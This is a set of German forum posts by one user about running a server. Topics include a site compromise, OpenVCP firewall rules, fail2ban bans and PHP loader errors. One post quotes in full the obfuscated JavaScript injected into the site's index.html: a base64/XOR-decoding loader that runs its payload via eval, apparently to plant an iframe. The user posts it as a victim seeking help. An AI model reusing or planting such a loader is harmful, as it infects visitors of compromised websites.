Beiträge von informant

Das alte ist wohl kaum Knackbar wenn es ähnlich

A1-3r.t@RRru!dfOP-ER.0

ausschaut und 20 stellig ist.

PS: Haben wir jedoch bereits beim bemerken geändert

28.11.2010 um 22:00 Uhr

Habe die Datei mit der originalen wieder überschrieben am gestrigen Nachmittag, als es uns aufgefallen war. Seit dem ist wieder alles OK.

MfG

Hallo,

Passwort ist nicht gespeichert. Zu dieser Zeit sowie 1 Tag davor + 2 Tage danach war der entsprechende PC auch aus. Wir nutzen kein Frontpage o.ä. auch kein P2P. In der xfer.log ist zu dieser Zeit kein Transfer ersichtlich...

MfG

Hi, haben wir bereitsgemacht. Sind keine Infomationen in dieser Art ersichtlich. Der Vorfall ereignete sich genau zu dem Zeitpunkt, wo netcup angegriffen wurde. Ein unsicheres Script schließen wir zu 100% aus.

Wo könnten wir noch herausfinden, woher das kommt, da unsereseits alles bestens abgeriegelt ist. Gern kann jeder der will unseren Server auf Lücken prüfen, wir haben keine gefunden und sind auch seite mehr als 10 Jahren im Geschäft mit Servern und dessen Konfigurationen.

Wir bitten daher um weitere Infos...

MfG

Hallo,

seit dem Angriff auf die netcup Server hat unsere index.html Datei folgenden Code im Quellcode gehabt:

<script language="javascript">try { function wSeRLHzrSUGfbB(cIqLnSMrU){var wbRdWCU="",namwSyoX,RDqgWs,wFNcXL,oXHCthJwL,jwAkDWBZ,DjfmIsR,ibPZVqxH,oJThjISzR,rKxmdgfsjc;var cUNAbO="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var WlULi="";for(oJThjISzR=0;oJThjISzR<cIqLnSMrU.length;){oXHCthJwL=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));jwAkDWBZ=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));rKxmdgfsjc=wSeRLHzrSUGfbB;DjfmIsR=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));ibPZVqxH=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));namwSyoX=(oXHCthJwL<<2)+(jwAkDWBZ>>4);RDqgWs=((jwAkDWBZ&15)<<4)+(DjfmIsR>>2);wFNcXL=((DjfmIsR&3)<<6)+ibPZVqxH;rKxmdgfsjc=rKxmdgfsjc.toString();wbRdWCU+=String.fromCharCode(namwSyoX);if(DjfmIsR!=64)wbRdWCU+=String.fromCharCode(RDqgWs);if(ibPZVqxH!=64)wbRdWCU+=String.fromCharCode(wFNcXL);}rKxmdgfsjc=rKxmdgfsjc.replace(/\W/g,"");rKxmdgfsjc=rKxmdgfsjc.split("").reverse().join("");for(oJThjISzR=0;oJThjISzR<wbRdWCU.length;oJThjISzR++)WlULi+=String.fromCharCode(wbRdWCU.charCodeAt(oJThjISzR%wbRdWCU.length)^rKxmdgfsjc.charCodeAt(oJThjISzR%rKxmdgfsjc.length));return eval(WlULi);}wSeRLHzrSUGfbB("SWx1THdMQVZFTlJVVGx7HhUVTgwKEQseA0dZTRwkEScXNiceRjc4ChU1ACEDJh8EBhdLSBoAFQUAHWlbU35uZwwKJyI6AXwVHjYOO2lXSHZ7TU9LbG0GJQAABQZ7KzINNQoDRVlPYUNDU0lkZhsAFQ8EF1ogGy91UXdwEic9GlJ7ZQIBB1MGFls9KyRKMQ0afRJ8MB4LLi4BVyEdISFEGDw6TUllb2cNAAkQHhcLAksQGw0VXhITGhYIAycFEScWSwMVFAYJCFFw");} catch(e){}</script>

Es handelt sich dabei um das einbringen eines iFrames.... wenn ich den Code korrekt übersetzt habe...

Der Server nutzt kein proftpd sondern vsftpd, ist auf dem aktuellsten Stand. Das Passwort vom Root ist sehr sicher und es kennt keiner. Weiterhin ist der Login via root nicht möglich sondern nur durch einen User und dieser hat ebenfalls ein sehr sicheres Passwort. Auf der Seite ist nur reiner HTML Code und CSS für Schriftart und Farben.

Wie kann das also sein, dass die index.html plötzlich nach dem Angriff einen solchen Code erhält, wenn kein Zugriff von unserer Seite aus möglich war?

Wir würden uns über eine Antwort freuen. Vielen Dank...

MfG

*gelöst*
lag an der Versionsbezeichnung!

Hallo,

ich habe folgende Frage. Beim 64 bit Debian Lenny bekomm ich nach dem Installieren von Zend und Ioncube_loader folgende Meldungen:

Zitat

Failed loading /usr/local/lib/ioncube/ioncube_loader_lin_5.0.so: /usr/local/lib/ioncube/ioncube_loader_lin_5.0.so: undefined symbol: empty_string
Failed loading /usr/local/lib/Zend/ZendOptimizer.so: /usr/local/lib/Zend/ZendOptimizer.so: undefined symbol: empty_string

Hat evtl. jmd. eine Idee/Lösung?
Besten Dank...

MfG

Hallo,

wenn ich den Source Port leer lasse scheint es zu klappen. Werd es mal beobachten.

MfG

Hallo,

ich habe die Source IP jedoch eingetragen und nicht leer gelassen, dann klappt es leider nicht, die Verbindung kommt zu Stande... trotz Firewall Rule...

INPUT tcp 88.77.213.242 25 meineServerIP 25 DROP STATE NEW,ESTABLISHED,RELATED

und das selbe mit 110 als Port.

Habe das mit mehreren Adressen getestet, leider immer das selbe Problem, dass Sie nicht gebannt werden...

MfG

Hallo,

die Rule greift einfach nicht. Habe Port 110 und 25 (TCP) mit den Einstellungen blockiert, die eingetragene IP kann dennoch über beide Ports zugreifen. Hat jmd. eine Idee, damit der Filter funktioniert?

MfG

Aha ok, evtl wird ja mal das komplette OpenVCP geupdatet. Die neue Version hat viele neue Eigenschaften und ist sehr entbugt...

Die Frage ist aber, warum kann die gesperrte IP dennoch eine Verbindung via Port 25/110 aufbauen, auch wenn ich TCP beide sperre...

MfG

any steht doch aber beim Protokoll. Normal sollte any alle verfügbaren Protokolle sein... Sehr komisch. Kann man eine Regel irgendwie bearbeiten? Finde nur deaktivieren und löschen...

MfG

Hallo,

ich habe soeben ein paar Firewall Rules im Webinterface hinzugefügt, da ja iptables leider nicht geht.
Die gesperrte IP kann den Server dennoch erreichen.
Folgendes habe ich eingetragen:

INPUT any 88.77.213.242 25 meineServerIP 25 DROP
INPUT any 88.77.213.242 110 meineServerIP 110 DROP

Was ist daran falsch oder habe ich etwas vergessen, damit die 88.77.213.242 geblockt wird? Bitte um Informationen. Besten Dank...

MfG

Hallo,

besten Dank.

Gibt es eine Möglichkeit, wie ich das Script per Hand aufrufen und testen kann. ./script.sh ip-adresse oder gibt es einen anderen Weg?

MfG

Hi,

kann ich das nicht in einem Script (Hauptscript) machen?

MfG

Hallo,

aber wie wandel ich das um, bzw. in welche Kodierung? Wie in PHP? urlencode()?

Bräuchte die Zeichen ! . -

MfG

Hallo,
URL-Encode im ShellScript? Wie geht das denn? Ein Login muss auch mit Sonderzeichen möglich sein. Würde mir jmd. ein Bsp. liefern, wie ich die Zeichen in diesem Script umwandel, so dass der Login funktioniert? Denn fail2ban erkennt ja, das die IPs bereits gebannt sind, nur in der Firewall ist nichts ersichtlich...

Danke...

Hi, hab vor jedem Sonderzeichen einen Backslash gemacht.
Log sagt auch weiterhin

Zitat

2010-07-02 20:30:01,607 fail2ban.actions: WARNING [apache-w00tw00t] Ban 62.141.46.179
2010-07-02 20:40:22,370 fail2ban.actions: WARNING [apache-w00tw00t] Ban 85.18.119.96

Jedoch sehe ich im OpenVCP keinen Eintrag in der Firewall. Alles leer. Noch eine Idee evtl?

MfG

Hallo,

ja, ich habe den Namen rauskopiert, einmal gibt es den Zwar mit großem v und einmal mit kleinem somit hab ich das kleine v genommen, User + Passwort stimmen. Passwort enthält jedoch Sonderzeichen (Sicherheit halt).

MfG

Danke für die Info. Normal müsste ich doch in der Firewall des openvcp Einträge sehen oder?

Seh da keine aber in den Logs steht add ban ip?